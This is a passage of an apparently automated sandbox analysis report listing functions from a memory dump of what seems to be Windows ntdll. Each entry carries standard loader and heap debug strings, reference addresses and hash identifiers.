                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                • Opcode ID: 99fb755fb62c5d2cd5540db43ffb58fcf9aef4d56d0fe801e624938625445f8e
                                                                                                                                                                                                                                • Instruction ID: 03b59fa1e6fd84fb95a0a6df5dcaf230df91fc37cfb52446c4ae33d7568e6ef8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99fb755fb62c5d2cd5540db43ffb58fcf9aef4d56d0fe801e624938625445f8e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3414CF5E0021AABCB05CF95D894ADEBBB5FF48355F200119ED85AB340D771AD12DB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F26F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                • Opcode ID: 9c8b040795059252fe2f9f4f290f7bea66b8025d1c6ac8495d13405259029316
                                                                                                                                                                                                                                • Instruction ID: a75f2bfd70c9869e7e93b0b71cff66770362bf57d4fb65678d1282f839fcc431
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c8b040795059252fe2f9f4f290f7bea66b8025d1c6ac8495d13405259029316
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2710135910686DFCB01CF68C4A0AEDFBF2FF49320F54815DE8859B651EB35A992CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1B6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F219854, 1F219895
                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F219885
                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 1F21984A, 1F21988B
                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F219843
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                • Opcode ID: 40608847413ced9ddc1fbdad327ed4c85192cd050563c46f6bd1cff1a8475ce6
                                                                                                                                                                                                                                • Instruction ID: 931b20b6ae2276434641a93113cce368ad17526a3197301d1e96d642a52c5cbb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40608847413ced9ddc1fbdad327ed4c85192cd050563c46f6bd1cff1a8475ce6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F15134B6B103A4DFDB04DBA8CC98EDD77B6AB54314F050169E802AF695DB75BC60CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1ED6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1ED879
                                                                                                                                                                                                                                  • Part of subcall function 1F1C4779: RtlDebugPrintTimes.NTDLL ref: 1F1C4817
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                                • Opcode ID: 3124d99aa881a27bdc6406301ff757e734fcf7e1bb8d7b80af310a4ff2f554a9
                                                                                                                                                                                                                                • Instruction ID: b779dd6e6383a264e5cb19cd0851cd2d457f9156df0c357d23c751f3dbdfe284
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3124d99aa881a27bdc6406301ff757e734fcf7e1bb8d7b80af310a4ff2f554a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88513475E047469FDB05CFA8C5A8B8EBBF1BF44318FA04159D8016B682D772B9B5CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1EDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                                • Opcode ID: d28e37e830d7f0d1faf8af6b0cc34cfddb39899feff9945719f74f3a5d02b597
                                                                                                                                                                                                                                • Instruction ID: b0bd43081709e98db9a983e89c212fb84f8d3b6ca5a8220e93aa3ed0daccfd2c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d28e37e830d7f0d1faf8af6b0cc34cfddb39899feff9945719f74f3a5d02b597
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C412734B14B42DFD712CF28C994B99B3E4FF81320F544569D9068B682C778B9A1CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F26ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ---------------------------------------, xrefs: 1F26EDF9
                                                                                                                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1F26EDE3
                                                                                                                                                                                                                                • Entry Heap Size , xrefs: 1F26EDED
                                                                                                                                                                                                                                • HEAP: , xrefs: 1F26ECDD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                                • Opcode ID: a39dcb88540f3cb3d7441fdf985e7e72629e6194f7c2f1bd8d99b28b4286074e
                                                                                                                                                                                                                                • Instruction ID: b9e568a1ecd8d6122caae2222c747a988269aa38257255dcb07c613263938d36
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a39dcb88540f3cb3d7441fdf985e7e72629e6194f7c2f1bd8d99b28b4286074e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5417A75A00A22DFCB14CF58C48894ABBA9FF4A36472581ADEC059F651D732FC92CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1EDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                • Opcode ID: b6e8112d55cc47ca7d0c51527f8d4087fb8e83bad21db987ac8f06af904bf2fe
                                                                                                                                                                                                                                • Instruction ID: 79f41eb367ea28b521ab0ac8f9fe6fcb2c75479d6c5debdc1a2d3f6ac3610219
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e8112d55cc47ca7d0c51527f8d4087fb8e83bad21db987ac8f06af904bf2fe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D313935610BC5EFD722CB28C869F8977E4FF02B20F044589E8028BA92D77AB971C651
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1C9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                                • Opcode ID: 9d1311d97783a12ea351a9ca793b7cee843f1fb3502a404639191f1a75ec00b4
                                                                                                                                                                                                                                • Instruction ID: aa5400c2d001c9580bbf1bc6f3e29737826c11112fb5bb18be2aaf8cc5fb9f6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d1311d97783a12ea351a9ca793b7cee843f1fb3502a404639191f1a75ec00b4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04813D71D002699BDB31CF54CC44BDEBAB8AF09710F4141DAE90AB7280E771AE94CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F233439
                                                                                                                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1F23344A, 1F233476
                                                                                                                                                                                                                                • LdrpFindDllActivationContext, xrefs: 1F233440, 1F23346C
                                                                                                                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1F233466
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                                • Opcode ID: 9a934783cc344d3882fa44a520bd96b809052f837b39620d30cb1c3b0c9941f4
                                                                                                                                                                                                                                • Instruction ID: df82a12404831f89fe0da4df0b945d1ab19d0349c8f77ea7aef558063d51965f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a934783cc344d3882fa44a520bd96b809052f837b39620d30cb1c3b0c9941f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C315FB2E80392AFEB21DB04C988B95B6A4FB00364F079127E8455B650F771BDB8C3D1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1E237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F22A7AF
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1E2382
                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 1F22A7A5
                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1F22A79F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                • Opcode ID: 5fb709445614c8a13cf36c63cd287d5ae568843774c68b97d89d4f6f70b52d33
                                                                                                                                                                                                                                • Instruction ID: 236d2609ba230f6925247e99096d60b82223922ff6571b5f4f12bc7abbc6f8ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb709445614c8a13cf36c63cd287d5ae568843774c68b97d89d4f6f70b52d33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E03105B6E00291AFE7108F69C8C8A9A77F5EB84720F650159EC01ABA41E672BC61CF51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1BF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                                • Opcode ID: 6be5b31cc18d4f0a6c3179cc870b27f8736425ca5027018f1060119fb13e09db
                                                                                                                                                                                                                                • Instruction ID: 8ee8f806bc78247501a5a2a9ce35f507053d2bea9370523c09ee2b944edadecf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6be5b31cc18d4f0a6c3179cc870b27f8736425ca5027018f1060119fb13e09db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C910E71608B82EBC315DB74C8A4B6AB7F5BF84B40F11055DF8419F681EB35B862CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1E0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F229F2E
                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 1F229F24
                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 1F229F1C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                                                                • Opcode ID: 427c3f6d6f33cb7cb14cc58106f42afcefe24dc262ef40e0f2ea8f3846e8cfa5
                                                                                                                                                                                                                                • Instruction ID: ee100ac9eed1a1b5ccd15df769caad42fa9020ea1b08effe68c45f610e56dd71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 427c3f6d6f33cb7cb14cc58106f42afcefe24dc262ef40e0f2ea8f3846e8cfa5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B71F179A006469FCB05DFA8C984AAEB7F4FF44308F54406DE80AEB651E735BE61CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1E9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                                                                • Opcode ID: acc61d472ba8c1a3860732d897901d22ffae35b7f885a07662602ff1a76206eb
                                                                                                                                                                                                                                • Instruction ID: f450d4da19405573525c166a0e28bc87aaaad1d8820f97f34864a8162fef249b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acc61d472ba8c1a3860732d897901d22ffae35b7f885a07662602ff1a76206eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62513775B00B429BC312DF39CD84F5A77A2BB84310F94066DE8538B692E775B874CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1FC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2380F3
                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 1F2380E2
                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 1F2380E9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                                • Opcode ID: 4e7c0034023c05ec62f4ca801cb9748751a420a130957f6860143c187de243ae
                                                                                                                                                                                                                                • Instruction ID: 8c78b1eb706a25037d9c0ff074ad5bdb4c501d23cda40fa386117c4f84db61ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e7c0034023c05ec62f4ca801cb9748751a420a130957f6860143c187de243ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F4127B5904751ABC711DF24CD88B8B37E8EF84720F00492AFC9997650E775F924DB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2443D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1F244508
                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 1F24450F
                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 1F244519
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                                • Opcode ID: a7ec845ab7e417474dc46ffcfcec0696c2e67e7121b71ef39c580ae27da4ed9f
                                                                                                                                                                                                                                • Instruction ID: 55aa7ab684b98fded8bb4df87bf5570aca0f8eb4a5e5df36dc4018e735b1b4a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7ec845ab7e417474dc46ffcfcec0696c2e67e7121b71ef39c580ae27da4ed9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41E1726147229BCB18CF68C840A5677E4FF88760B360659EC98DB259E7B1ED00CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

